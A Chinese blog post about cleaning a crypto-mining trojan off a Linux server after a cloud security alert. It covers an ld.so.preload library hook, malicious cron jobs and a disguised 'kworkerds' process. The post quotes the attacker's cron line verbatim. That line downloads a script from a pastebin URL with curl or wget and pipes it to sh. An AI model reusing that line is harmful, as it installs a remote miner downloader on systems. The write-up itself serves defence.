• 云盾态势感知系统检测到您的服务器出现了紧急安全事件:挖矿木马


    问题描述:收到阿里云的报警通知

    在这里插入图片描述

    登录服务器查看进程:未发现有进程占用CPU过高的现象

    在这里插入图片描述

    查看/etc/ld.so.preload文件,里面连接到/usr/local/lib/libdns.so

    [root@SJ-pre-release ~]# cat /etc/ld.so.preload
    /usr/local/lib/libdns.so
    

    查看/usr/local/lib/路径,看看是否有libdns.so文件

    查看定时任务,发现存在一个陌生的定时任务,

     [root@SJ-pre-release ~]# crontab -l
    */23 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
    

    解决办法:

        ###清除/etc/ld.so.preload的内容
        [root@SJ-pre-release ~]# echo "" > /etc/ld.so.preload
       ### 删除/usr/local/lib/lib/libdns.so文件
        [root@SJ-pre-release ~]# rm -rf /usr/local/lib/lib/libdns.so
       ### 删除定时任务
        [root@SJ-pre-release ~]# cat /var/spool/cron/root
        */23 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
        ##
        [root@SJ-pre-release ~]# rm -rf /var/spool/cron/root
        [root@SJ-pre-release ~]# cat /var/spool/cron/crontabs/root
        */31 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
        ##
        [root@SJ-pre-release ~]# rm -rf /var/spool/cron/crontabs/root
    

    在这里插入图片描述

    再次查看进程,发现有一个kworkerds,进程号为14711的进程,CPU占有率高达397.5%

    [root@SJ-pre-release ~]# top
    top - 09:12:50 up 229 days, 21:41,  9 users,  load average: 4.23, 4.12, 4.08
    Tasks: 145 total,   1 running, 144 sleeping,   0 stopped,   0 zombie
    %Cpu(s): 99.8 us,  0.2 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
    KiB Mem:   8011936 total,  7647536 used,   364400 free,   303504 buffers
    KiB Swap:        0 total,        0 used,        0 free.   301404 cached Mem
    
      PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
    14711 root      20   0  566768  35644    756 S 397.5  0.4   1719:53 kworkerds
    11701 root      20   0 4730228 797664  12764 S   1.7 10.0 536:07.20 java
    18094 root      20   0       0      0      0 S   0.3  0.0   0:00.05 kworker/3:2
    18155 root      20   0  123696   1684   1156 R   0.3  0.0   0:00.08 top
    22408 root      20   0 1281204 193204   5124 S   0.3  2.4  77:45.91 node
    

    在这里插入图片描述

    使用ps命令查看该进程的路径

    [root@SJ-pre-release ~]# ps -aux | grep 14711
    root     14711  397  0.4 566768 35644 ?        Sl   02:00 1720:38 /tmp/kworkerds
    root     18157  0.0  0.0 112644   984 pts/1    S+   09:13   0:00 grep --color=auto 14711
    先删掉进程,再删除文件
    [root@SJ-pre-release ~]# kill -9 14711
    [root@SJ-pre-release ~]# ps -aux | grep 14711
    root     18175  0.0  0.0 112644   984 pts/1    S+   09:13   0:00 grep --color=auto 14711
    [root@SJ-pre-release ~]# rm -rf /tmp/kworkerds
    

    在这里插入图片描述
    问题解决

  • 相关阅读:
    git
    composer
    laravel saas
    算法模板-01背包
    GMP-C/C++(大数库)使用方法
    算法模板-容斥原理
    算法模板-欧拉函数
    算法模板-素数判断/素数筛法
    算法模板-质因数分解
    算法模板-快速幂取模
  • 原文地址:https://www.cnblogs.com/sujc-blogs/p/9722480.html
Copyright © 2020-2023  润新知